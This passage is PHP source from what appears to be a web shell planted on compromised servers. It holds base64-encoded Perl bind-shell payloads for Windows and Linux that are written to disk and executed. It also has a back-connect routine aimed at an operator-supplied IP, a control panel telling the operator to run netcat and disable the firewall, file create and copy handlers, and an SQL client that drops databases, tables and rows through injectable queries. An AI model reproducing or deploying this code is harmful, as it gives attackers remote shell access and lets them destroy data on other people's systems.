fclose($opbc);
system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
function wbp($wb){
$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
$opwb=fopen("wbp.pl","w");
fwrite($opwb,base64_decode($wbp));
fclose($opwb);
echo getcwd();
system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
function lbp($wb){
$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
$oplb=fopen("lbp.pl","w");
fwrite($oplb,base64_decode($lbp));
fclose($oplb);
system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
if($_REQUEST***91;'portbw'***93;){
wbp($_REQUEST***91;'portbw'***93;);
}if($_REQUEST***91;'portbl'***93;){
lbp($_REQUEST***91;'portbl'***93;);
}
if($_REQUEST***91;'ipcb'***93; && $_REQUEST***91;'portbc'***93;){
bcn($_REQUEST***91;'ipcb'***93;,$_REQUEST***91;'portbc'***93;);
}
if($_REQUEST***91;'do'***93;=="bc"){
echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Back Connect >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER***91;'REMOTE_ADDR'***93; ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;
}
function copyf($file1,$file2,$filename){
global $slash;
$fpc = fopen($file1, "rb");
$source = '';
while (!feof($fpc)) {
$source .= fread($fpc, 8192);
}
fclose($fpc);
$opt = fopen($file2.$slash.$filename, "w");
fwrite($opt, $source);
fclose($opt);
}
if ($_REQUEST***91;'copyname'***93; && $_REQUEST***91;'cpyto'***93;){
if(is_writable($_REQUEST***91;'cpyto'***93;)){
echo $_REQUEST***91;'address'***93;;
copyf($_REQUEST***91;'address'***93;.$slash.$_REQUEST***91;'copyname'***93;,$_REQUEST***91;'cpyto'***93;,$_REQUEST***91;'copyname'***93;);
}else{alert("Permission Denied !");}}
if($_REQUEST***91;'cfilename'***93;){
echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST***91;'cfilename'***93;.'" name=nf4c size=50><br><input type=submit value=" Create "></form>'.$end;exit;
}
if($_REQUEST***91;'nf4c'***93; && $_REQUEST***91;'nf4cs'***93;){
if($ofile4c=fopen($_REQUEST***91;'nf4c'***93;,"w")){
fwrite($ofile4c,$_REQUEST***91;'nf4cs'***93;);
fclose($ofile4c);
alert("File Saved !");}else{alert("Permission Denied !");}}
function sqlclienT(){
global $t,$errorbox,$et,$hcwd;
if(!empty($_REQUEST***91;'serveR'***93;) && !empty($_REQUEST***91;'useR'***93;) && isset($_REQUEST***91;'pasS'***93;) && !empty($_REQUEST***91;'querY'***93;)){
$server=$_REQUEST***91;'serveR'***93;;$type=$_REQUEST***91;'typE'***93;;$pass=$_REQUEST***91;'pasS'***93;;$user=$_REQUEST***91;'useR'***93;;$query=$_REQUEST***91;'querY'***93;;
$db=(empty($_REQUEST***91;'dB'***93;))?'':$_REQUEST***91;'dB'***93;;
$_SESSION***91;server***93;=$_REQUEST***91;'serveR'***93;;$_SESSION***91;type***93;=$_REQUEST***91;'typE'***93;;$_SESSION***91;pass***93;=$_REQUEST***91;'pasS'***93;;$_SESSION***91;user***93;=$_REQUEST***91;'useR'***93;;
}
if (isset ($_GET***91;select_db***93;)){
$getdb=$_GET***91;select_db***93;;
$_SESSION***91;db***93;=$getdb;
$query="SHOW TABLES";
$res=querY($_SESSION***91;type***93;,$_SESSION***91;server***93;,$_SESSION***91;user***93;,$_SESSION***91;pass***93;,$_SESSION***91;db***93;,$query);
}
elseif (isset ($_GET***91;select_tbl***93;)){
$tbl=$_GET***91;select_tbl***93;;
$_SESSION***91;tbl***93;=$tbl;
$query="SELECT * FROM `$tbl`";
$res=querY($_SESSION***91;type***93;,$_SESSION***91;server***93;,$_SESSION***91;user***93;,$_SESSION***91;pass***93;,$_SESSION***91;db***93;,$query);
}
elseif (isset ($_GET***91;drop_db***93;)){
$getdb=$_GET***91;drop_db***93;;
$_SESSION***91;db***93;=$getdb;
$query="DROP DATABASE `$getdb`";
querY($_SESSION***91;type***93;,$_SESSION***91;server***93;,$_SESSION***91;user***93;,$_SESSION***91;pass***93;,'',$query);
$res=querY($_SESSION***91;type***93;,$_SESSION***91;server***93;,$_SESSION***91;user***93;,$_SESSION***91;pass***93;,'','SHOW DATABASES');
}
elseif (isset ($_GET***91;drop_tbl***93;)){
$getbl=$_GET***91;drop_tbl***93;;
$query="DROP TABLE `$getbl`";
querY($_SESSION***91;type***93;,$_SESSION***91;server***93;,$_SESSION***91;user***93;,$_SESSION***91;pass***93;,$_SESSION***91;db***93;,$query);
$res=querY($_SESSION***91;type***93;,$_SESSION***91;server***93;,$_SESSION***91;user***93;,$_SESSION***91;pass***93;,$_SESSION***91;db***93;,'SHOW TABLES');
}
elseif (isset ($_GET***91;drop_row***93;)){
$getrow=$_GET***91;drop_row***93;;
$getclm=$_GET***91;clm***93;;
$query="DELETE FROM `$_SESSION***91;tbl***93;` WHERE $getclm='$getrow'";
$tbl=$_SESSION***91;tbl***93;;
querY($_SESSION***91;type***93;,$_SESSION***91;server***93;,$_SESSION***91;user***93;,$_SESSION***91;pass***93;,$_SESSION***91;db***93;,$query);
$res=querY($_SESSION***91;type***93;,$_SESSION***91;server***93;,$_SESSION***91;user***93;,$_SESSION***91;pass***93;,$_SESSION***91;db***93;,"SELECT * FROM `$tbl`");
}
else
$res=querY($type,$server,$user,$pass,$db,$query);
if($res){
$res=htmlspecialchars($res);
$row=array ();
$title=explode('***91;+***93;***91;+***93;***91;+***93;',$res);
$trow=explode('***91;-***93;***91;-***93;***91;-***93;',$title***91;1***93;);
$row=explode('|+|+|+|+|+|',$title***91;0***93;);
$data=array();
$field=$trow***91;count($trow)-2***93;;
if (strstr($trow***91;0***93;,'Database')!='')
$obj='db';
elseif (substr($trow***91;0***93;,0,6)=='Tables')
$obj='tbl';
else
$obj='row';
$i=0;
foreach ($row as $a){
if($a!='')
$data***91;$i++***93;=explode('|-|-|-|-|-|',$a);
}
echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
foreach ($trow as $ti)
echo "<td bgcolor='F2F2F2'>$ti</td>";
echo "</tr>";
$j=0;
while ($data***91;$j***93;){
echo "<tr>";
foreach ($data***91;$j++***93; as $dr){
echo "<td>";
if($obj!='row') echo "<a href='$_SERVER***91;PHP_SELF***93;?do=db&select_$obj=$dr'>";
echo $dr;
if($obj!='row') echo "</a>";
echo "</td>";
}
echo "<td><a href='$_SERVER***91;PHP_SELF***93;?do=db&drop_$obj=$dr";
if($obj=='row')
echo "&clm=$field";
echo "'>Drop</a></td></tr>";
}
echo "</table><br>";
}